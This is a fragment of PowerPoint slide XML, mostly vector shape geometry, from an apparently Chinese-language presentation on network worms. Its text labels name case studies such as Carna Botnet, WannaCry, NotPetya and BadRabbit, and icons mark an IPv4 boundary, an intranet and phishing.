                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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7" name="警告符号"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3486000" y="3342324"/>
              <a:ext cx="604446" cy="604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600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10685" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9798" y="0"/>
                    <a:pt x="9001" y="498"/>
                    <a:pt x="8605" y="1300"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="248" y="18197"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-115" y="18931"/>
                    <a:pt x="-79" y="19786"/>
                    <a:pt x="348" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="775" y="21183"/>
                    <a:pt x="1515" y="21600"/>
                    <a:pt x="2327" y="21600"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="21600"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19853" y="21600"/>
                    <a:pt x="20593" y="21183"/>
                    <a:pt x="21020" y="20484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21447" y="19786"/>
                    <a:pt x="21485" y="18931"/>
                    <a:pt x="21122" y="18197"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12765" y="1300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12369" y="498"/>
                    <a:pt x="11572" y="0"/>
                    <a:pt x="10685" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="744"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11291" y="744"/>
                    <a:pt x="11836" y="1084"/>
                    <a:pt x="12108" y="1632"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20464" y="18530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20712" y="19032"/>
                    <a:pt x="20686" y="19615"/>
                    <a:pt x="20394" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20102" y="20570"/>
                    <a:pt x="19597" y="20856"/>
                    <a:pt x="19042" y="20856"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2327" y="20856"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="20856"/>
                    <a:pt x="1266" y="20570"/>
                    <a:pt x="974" y="20093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="19615"/>
                    <a:pt x="658" y="19032"/>
                    <a:pt x="906" y="18530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9262" y="1632"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9534" y="1084"/>
                    <a:pt x="10079" y="744"/>
                    <a:pt x="10685" y="744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10685" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10315" y="1384"/>
                    <a:pt x="9996" y="1585"/>
                    <a:pt x="9830" y="1919"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1472" y="18817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1323" y="19118"/>
                    <a:pt x="1338" y="19470"/>
                    <a:pt x="1514" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689" y="20044"/>
                    <a:pt x="1993" y="20214"/>
                    <a:pt x="2327" y="20214"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19042" y="20214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19375" y="20214"/>
                    <a:pt x="19679" y="20044"/>
                    <a:pt x="19855" y="19757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20030" y="19470"/>
                    <a:pt x="20046" y="19118"/>
                    <a:pt x="19896" y="18817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11540" y="1919"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11374" y="1585"/>
                    <a:pt x="11055" y="1384"/>
                    <a:pt x="10685" y="1384"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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36" name="成组"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3134898" y="2501733"/>
            <a:ext cx="6735004" cy="6756734"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6735002" cy="6756733"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="134541" y="145406"/>
              <a:ext cx="6465921" cy="6465921"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="80878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0" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3234698" y="0"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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1" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3234698" y="6491127"/>
              <a:ext cx="265606" cy="265607"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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2" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6469397" y="3245563"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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3" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3245563"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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4" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="967021" y="907287"/>
              <a:ext cx="265606" cy="265607"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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5" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5502375" y="907287"/>
              <a:ext cx="265606" cy="265607"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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6" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2016374" y="248079"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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7" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446818" y="248079"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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8" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="267452" y="1983547"/>
              <a:ext cx="265607" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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9" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6199982" y="1983547"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="267452" y="4525338"/>
              <a:ext cx="265607" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="967021" y="5583839"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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2" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2016374" y="6243048"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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3" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4446818" y="6243048"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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4" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5502375" y="5583839"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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5" name="圆形"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6199982" y="4525338"/>
              <a:ext cx="265606" cy="265606"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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7" name="IPv4边界"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8851146" y="5245100"/>
            <a:ext cx="1524001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00" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4003" y="0"/>
                  <a:pt x="3600" y="484"/>
                  <a:pt x="3600" y="1080"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3600" y="8640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="20520"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3600" y="21116"/>
                  <a:pt x="4003" y="21600"/>
                  <a:pt x="4500" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20700" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21197" y="21600"/>
                  <a:pt x="21600" y="21116"/>
                  <a:pt x="21600" y="20520"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="1080"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="484"/>
                  <a:pt x="21197" y="0"/>
                  <a:pt x="20700" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4500" y="0"/>
                </a:ln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IPv4边界</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="大内网"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1402360" y="5190042"/>
            <a:ext cx="153035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6" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="401" y="0"/>
                  <a:pt x="0" y="484"/>
                  <a:pt x="0" y="1080"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20520"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21116"/>
                  <a:pt x="401" y="21600"/>
                  <a:pt x="896" y="21600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17029" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17524" y="21600"/>
                  <a:pt x="17925" y="21116"/>
                  <a:pt x="17925" y="20520"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17925" y="13034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="10874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17925" y="8714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17925" y="1080"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17925" y="484"/>
                  <a:pt x="17524" y="0"/>
                  <a:pt x="17029" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="896" y="0"/>
                </a:ln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大内网</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="钓鱼"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8936762" y="2584469"/>
            <a:ext cx="1352769" cy="11746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1" h="20891" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="17655" y="2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15586" y="46"/>
                  <a:pt x="12735" y="717"/>
                  <a:pt x="9502" y="3175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9355" y="3043"/>
                  <a:pt x="9176" y="2952"/>
                  <a:pt x="8976" y="2923"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8394" y="2839"/>
                  <a:pt x="7860" y="3300"/>
                  <a:pt x="7785" y="3953"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7763" y="4140"/>
                  <a:pt x="7782" y="4321"/>
                  <a:pt x="7833" y="4488"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2478" y="8702"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2323" y="8798"/>
                  <a:pt x="1444" y="9278"/>
                  <a:pt x="912" y="8315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="886" y="8255"/>
                  <a:pt x="722" y="7845"/>
                  <a:pt x="850" y="7424"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="948" y="7104"/>
                  <a:pt x="1200" y="6833"/>
                  <a:pt x="1596" y="6616"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1550" y="7584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998" y="4904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1311" y="5518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1428" y="5731"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1394" y="5737"/>
                  <a:pt x="1359" y="5746"/>
                  <a:pt x="1326" y="5763"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="677" y="6095"/>
                  <a:pt x="260" y="6562"/>
                  <a:pt x="86" y="7150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-159" y="7979"/>
                  <a:pt x="196" y="8721"/>
                  <a:pt x="220" y="8770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="646" y="9555"/>
                  <a:pt x="1238" y="9802"/>
                  <a:pt x="1781" y="9802"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2220" y="9802"/>
                  <a:pt x="2628" y="9642"/>
                  <a:pt x="2890" y="9473"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8363" y="5171"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8467" y="5229"/>
                  <a:pt x="8581" y="5270"/>
                  <a:pt x="8703" y="5287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9285" y="5372"/>
                  <a:pt x="9818" y="4910"/>
                  <a:pt x="9894" y="4257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9905" y="4157"/>
                  <a:pt x="9904" y="4059"/>
                  <a:pt x="9894" y="3962"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16014" y="-709"/>
                  <a:pt x="20748" y="1392"/>
                  <a:pt x="20811" y="1421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21015" y="1517"/>
                  <a:pt x="21250" y="1409"/>
                  <a:pt x="21335" y="1181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21421" y="952"/>
                  <a:pt x="21325" y="689"/>
                  <a:pt x="21121" y="592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21014" y="542"/>
                  <a:pt x="19725" y="-42"/>
                  <a:pt x="17655" y="2"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19923" y="7732"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17068" y="7741"/>
                  <a:pt x="10742" y="8278"/>
                  <a:pt x="5823" y="12443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5786" y="12474"/>
                  <a:pt x="5777" y="12541"/>
                  <a:pt x="5810" y="12582"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10185" y="14788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10185" y="14788"/>
                  <a:pt x="10725" y="15325"/>
                  <a:pt x="10071" y="15534"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5349" y="15534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5349" y="15534"/>
                  <a:pt x="9188" y="20891"/>
                  <a:pt x="21441" y="20891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21441" y="7785"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21441" y="7785"/>
                  <a:pt x="20875" y="7730"/>
                  <a:pt x="19923" y="7732"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12059" y="11548"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12534" y="11548"/>
                  <a:pt x="12920" y="11981"/>
                  <a:pt x="12920" y="12514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12920" y="13047"/>
                  <a:pt x="12534" y="13478"/>
                  <a:pt x="12059" y="13478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11584" y="13478"/>
                  <a:pt x="11200" y="13047"/>
                  <a:pt x="11200" y="12514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11200" y="11981"/>
                  <a:pt x="11584" y="11548"/>
                  <a:pt x="12059" y="11548"/>
                </a:cubicBez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 advAuto="0"/>
      <p:bldP spid="236" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="237" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="238" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="239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几个案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几个案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="拥有鼻祖身份的Carna Botn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拥有鼻祖身份的Carna Botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>全球完美收割的WannaCry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>携带内网渗透技巧的NotPetya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>猥琐钓鱼植入的BadRabbit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="机器人"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748810" y="3081900"/>
            <a:ext cx="3745046" cy="559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7636" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7308" y="0"/>
                  <a:pt x="7042" y="178"/>
                  <a:pt x="7042" y="398"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7042" y="1269"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7042" y="1360"/>
                  <a:pt x="6932" y="1434"/>
                  <a:pt x="6796" y="1434"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6444" y="1434"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6308" y="1434"/>
                  <a:pt x="6197" y="1509"/>
                  <a:pt x="6197" y="1600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6197" y="2450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6197" y="2541"/>
                  <a:pt x="6308" y="2614"/>
                  <a:pt x="6444" y="2614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6796" y="2614"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6932" y="2614"/>
                  <a:pt x="7042" y="2688"/>
                  <a:pt x="7042" y="2779"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7042" y="4048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4708" y="4048"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4373" y="4048"/>
                  <a:pt x="4102" y="4230"/>
                  <a:pt x="4102" y="4455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4102" y="5592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3470" y="5592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3470" y="5197"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3470" y="5006"/>
                  <a:pt x="3238" y="4850"/>
                  <a:pt x="2952" y="4850"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="575" y="4850"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="289" y="4850"/>
                  <a:pt x="57" y="5006"/>
                  <a:pt x="57" y="5197"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57" y="9364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="9530"/>
                  <a:pt x="233" y="9669"/>
                  <a:pt x="464" y="9703"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="464" y="10395"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="10429"/>
                  <a:pt x="57" y="10568"/>
                  <a:pt x="57" y="10734"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57" y="13326"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="13518"/>
                  <a:pt x="290" y="13672"/>
                  <a:pt x="575" y="13672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="771" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="14205"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="14293"/>
                  <a:pt x="-27" y="14412"/>
                  <a:pt x="19" y="14521"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="480" y="15614"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="506" y="15676"/>
                  <a:pt x="590" y="15719"/>
                  <a:pt x="686" y="15719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1020" y="15719"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1138" y="15719"/>
                  <a:pt x="1234" y="15655"/>
                  <a:pt x="1234" y="15576"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1234" y="14788"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1234" y="14591"/>
                  <a:pt x="1472" y="14431"/>
                  <a:pt x="1765" y="14431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2058" y="14431"/>
                  <a:pt x="2293" y="14591"/>
                  <a:pt x="2293" y="14788"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2293" y="15576"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2293" y="15655"/>
                  <a:pt x="2389" y="15719"/>
                  <a:pt x="2507" y="15719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2842" y="15719"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2937" y="15719"/>
                  <a:pt x="3022" y="15676"/>
                  <a:pt x="3048" y="15614"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3508" y="14521"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3554" y="14412"/>
                  <a:pt x="3518" y="14293"/>
                  <a:pt x="3410" y="14205"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2756" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952" y="13672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3238" y="13672"/>
                  <a:pt x="3470" y="13518"/>
                  <a:pt x="3470" y="13326"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3470" y="10734"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3470" y="10568"/>
                  <a:pt x="3297" y="10429"/>
                  <a:pt x="3065" y="10395"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3065" y="9703"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3297" y="9669"/>
                  <a:pt x="3470" y="9530"/>
                  <a:pt x="3470" y="9364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3470" y="7843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="7843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="13265"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4102" y="13490"/>
                  <a:pt x="4373" y="13672"/>
                  <a:pt x="4708" y="13672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5367" y="13672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5367" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5367" y="19764"/>
                  <a:pt x="5302" y="19890"/>
                  <a:pt x="5186" y="19992"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4326" y="20751"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4210" y="20853"/>
                  <a:pt x="4145" y="20979"/>
                  <a:pt x="4145" y="21107"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4145" y="21327"/>
                </a:lnTo>
                <a:cubicBezTo>
